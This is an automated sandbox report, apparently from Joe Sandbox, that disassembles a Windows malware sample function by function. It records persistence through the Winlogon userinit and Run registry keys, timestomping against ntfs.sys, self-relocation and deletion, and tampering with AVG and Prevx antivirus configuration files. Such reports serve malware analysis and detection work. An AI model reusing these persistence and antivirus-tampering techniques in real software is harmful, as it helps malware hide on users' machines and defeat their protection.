                                                                                                                                                                                                            • Instruction ID: b0f249d7cb80b728101da8bc3454e37707d64e119a9c5dc6a768cd6d24ad7165
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED712D74A00606AFCB10DB99CD84DAFB7B9AF88704B2441A6E504FB3D4D7B5ED42CB94
                                                                                                                                                                                                            Function 00402240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 300 402240-4022e1 CreateFileA 301 4022e3-402323 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 300->301 302 402324-402329 300->302 301->302
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040231D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                            • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                            • API String ID: 3225117150-898603304
                                                                                                                                                                                                            • Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                            • Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                            Function 00402950 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401C30,?,0000001C,00000000,00000000,7702DB30), ref: 0040298B
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004029A3
                                                                                                                                                                                                            • PathFileExistsA.KERNELBASE(?), ref: 004029C4
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 004029DC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402A1D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402A2D
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402A3E
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402A76
                                                                                                                                                                                                              • Part of subcall function 004012A0: GetTickCount.KERNEL32 ref: 004012AB
                                                                                                                                                                                                              • Part of subcall function 004012A0: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
                                                                                                                                                                                                              • Part of subcall function 004012A0: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC
                                                                                                                                                                                                              • Part of subcall function 00401330: GetTickCount.KERNEL32 ref: 0040135A
                                                                                                                                                                                                              • Part of subcall function 00401330: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
                                                                                                                                                                                                              • Part of subcall function 00401330: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402AF0
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00402B08
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00402B3A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B65
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402B68
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B74
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402B77
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402B96
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402BA5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402BB5
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402BC6
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402BE4
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402BF5
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402C00
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                            • String ID: %s_$.dat$Fri Jun 17 05:52:09 20111$IsWow64Process$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                            • API String ID: 4049655197-4201755136
                                                                                                                                                                                                            • Opcode ID: 76f81366a4f8225247b8614753da15890ae233e837e64cdd9c16a62ed84d21ea
                                                                                                                                                                                                            • Instruction ID: 2b42465635bf5f89377a844675b664ed4d82d183fb77d3ed61f84ac94699b08c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76f81366a4f8225247b8614753da15890ae233e837e64cdd9c16a62ed84d21ea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5718FB15143419BC310EF70DE8896B7BE9BBC8300B54493EF686B72A1D778D944CB99
                                                                                                                                                                                                            Function 00402420 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402547
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                            • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                            • API String ID: 606440919-2829233815
                                                                                                                                                                                                            • Opcode ID: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                            • Instruction ID: da06213ca23f861e298ab990455e1520987101534f77d1697d18ba9606f76a1b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03314871684218BEF311EB90DC96FEA7768EF89B00F104165F304AA1D0DBF16A45CBA9
                                                                                                                                                                                                            Function 00402810 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 198 402810-40284f RegCreateKeyExA 199 402855-4028b9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 198->199 200 4028dd-4028fe RegCreateKeyExA 198->200 201 4028c0-4028c5 199->201 202 402900-402902 200->202 203 402924-40292a 200->203 201->201 206 4028c7-4028db 201->206 207 402905-40290a 202->207 204 40292c-402937 RegFlushKey RegCloseKey 203->204 205 40293d-402940 203->205 204->205 208 40291e RegSetValueExA 206->208 207->207 209 40290c-40291d 207->209 208->203 209->208
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 00402873
                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 004028AB
                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 0040292D
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402937
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 004028F0
                                                                                                                                                                                                            • SystemDrive, xrefs: 00402861
                                                                                                                                                                                                            • userinit, xrefs: 00402918
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 3547530944-2324515132
                                                                                                                                                                                                            • Opcode ID: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
                                                                                                                                                                                                            • Instruction ID: 580de61d93956de76c260b8cd85b43503f34d02da1fa31da69fbe3ce3aace33d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F3166B5740305BBE720DB909D4AFEA777CDB95B00F208155FB44BA1D0D6F4AA448BA8
                                                                                                                                                                                                            Function 004013C0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 272 4013c0-401441 memset * 2 lstrcpynA CreateProcessA 273 401443-401453 272->273 274 40149f-4014a7 272->274 275 401455-40145e GetHandleInformation 273->275 276 40146d-401477 273->276 275->276 279 401460-401464 275->279 277 401491-40149c 276->277 278 401479-401482 GetHandleInformation 276->278 278->277 280 401484-401488 278->280 279->276 281 401466-401467 CloseHandle 279->281 280->277 282 40148a-40148b CloseHandle 280->282 281->276 282->277
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004013D8
                                                                                                                                                                                                            • memset.MSVCRT ref: 004013FE
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00402BDF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401416
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401439
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040145A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401467
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040147E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040148B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2248944234-2746444292
                                                                                                                                                                                                            • Opcode ID: c48a064c7529e876acfcd4e90bb1c684e8bfef1ce1d99d06041c7af5d8c72a1f
                                                                                                                                                                                                            • Instruction ID: 09676c1f46593a06cd44afd8140421a4ba04e6465ccbd83babddadcd264a60ad
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c48a064c7529e876acfcd4e90bb1c684e8bfef1ce1d99d06041c7af5d8c72a1f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 862165B1A002196FDB10DFE4DD85AEF7BBCAB44354F00817AFA08F6291D6349A448BB5
                                                                                                                                                                                                            Function 00401B60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 283 401b60-401b8c CreateFileA 284 401b92-401bae GetFileTime 283->284 285 401c25-401c2a 283->285 286 401bb0-401bbd GetHandleInformation 284->286 287 401bcc-401be9 CreateFileA 284->287 286->287 289 401bbf-401bc3 286->289 287->285 288 401beb-401c07 SetFileTime 287->288 288->285 290 401c09-401c16 GetHandleInformation 288->290 289->287 291 401bc5-401bc6 CloseHandle 289->291 290->285 292 401c18-401c1c 290->292 291->287 292->285 293 401c1e-401c1f CloseHandle 292->293 293->285
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401B85
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?,?,?), ref: 00401B9F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401BB5
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401BC6
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402B87,?), ref: 00401BE2
                                                                                                                                                                                                            • SetFileTime.KERNELBASE(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?), ref: 00401BF8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401C0E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401C1F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401B80
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                            • API String ID: 1046229350-2760794270
                                                                                                                                                                                                            • Opcode ID: a3513c22781d9b883142d906c5a388a7ca545872d8ccd4c85f932c2de55d5d3d
                                                                                                                                                                                                            • Instruction ID: 5c288fe5b10a83830543158496eb663db1d1ba801f64cc380cadfe311b19cddd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3513c22781d9b883142d906c5a388a7ca545872d8ccd4c85f932c2de55d5d3d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3721D7725402187BE7219B90DD09FEFBB7CAF84710F108225FF11761D0E774964586A8
                                                                                                                                                                                                            Function 004011C0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401C30,?,0000001C), ref: 004011EF
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401205
                                                                                                                                                                                                            • PathFileExistsA.KERNELBASE(?), ref: 00401212
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401229
                                                                                                                                                                                                            • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401241
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040125D
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040126C
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 00401279
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040128D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2787354276-0
                                                                                                                                                                                                            • Opcode ID: 13bd0b2ba2dd39b79c74d8f201215cd59729224600901bedf3da6c7ccc4d33b0
                                                                                                                                                                                                            • Instruction ID: 6fb89bbc187d80a5bc5b9bf27070627c8da11026cf83192134f00bca91ba5049
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13bd0b2ba2dd39b79c74d8f201215cd59729224600901bedf3da6c7ccc4d33b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C21FCB1900219AFDB50DBA0DD49FEA77BCAB48700F4045A9E705F6190E7B49A54CFA4
                                                                                                                                                                                                            Function 00401000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 303 401000-401009 304 401090-401096 303->304 305 40100f-401012 303->305 305->304 306 401014-401016 305->306 306->304 307 401018-401035 CreateFileA 306->307 308 401086-40108d 307->308 309 401037-40104d WriteFile 307->309 310 40105f-401068 309->310 311 40104f-401058 SetEndOfFile 309->311 310->308 313 40106a-401077 GetHandleInformation 310->313 311->310 312 40105a 311->312 312->310 313->308 314 401079-40107d 313->314 314->308 315 40107f-401080 CloseHandle 314->315 315->308
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00402B5B,00000000), ref: 0040102A
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,[+@,?,00000000,00000000,?,?,00402B5B,00000000), ref: 00401045
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000,?,?,00402B5B,00000000), ref: 00401050
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040106F
                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00401080
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Handle$CloseCreateInformationWrite
                                                                                                                                                                                                            • String ID: [+@
                                                                                                                                                                                                            • API String ID: 1150544999-2667881658
                                                                                                                                                                                                            • Opcode ID: 21b66d7867ddfbefa27aaeae67b762b005cc489ba47700022ac87a39cc13ab03
                                                                                                                                                                                                            • Instruction ID: c834b12cbe40c0e9b10b40bca9c4cb852a2dca9cf30c5b09766062945076e325
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21b66d7867ddfbefa27aaeae67b762b005cc489ba47700022ac87a39cc13ab03
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0311E971600244B7E7205B65DD08FAB765DDBC1790F048236FF84F62E0D7758D8082B8
                                                                                                                                                                                                            Function 00402330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 0040240F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFolderMovePath
                                                                                                                                                                                                            • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                            • API String ID: 1404575960-1083204512
                                                                                                                                                                                                            • Opcode ID: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
                                                                                                                                                                                                            • Instruction ID: 218ec206f196096905059f0fa712dce574fe6e09d85f3a618a89c2f21692c038
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43214FB45043448FC759CF14EA98B92BBF4BF98300F1581FADA89A73A2D774D944CB98
                                                                                                                                                                                                            Function 0040207A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 0040208C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: V,@
                                                                                                                                                                                                            • API String ID: 3664257935-3634209070
                                                                                                                                                                                                            • Opcode ID: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                            • Instruction ID: d15e959a12f23ccec2fe85088e2afbb8a6d817ea7d7d5b015e5417604cfff27a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D05E76E027298BCB20CF94A5052AEF730FB44731F0043AADE257338083351C118AD4

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00403440 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040348E
                                                                                                                                                                                                            • memset.MSVCRT ref: 004034AE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004034CE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004034D6
                                                                                                                                                                                                            • GetVersionExA.KERNEL32 ref: 004034F1
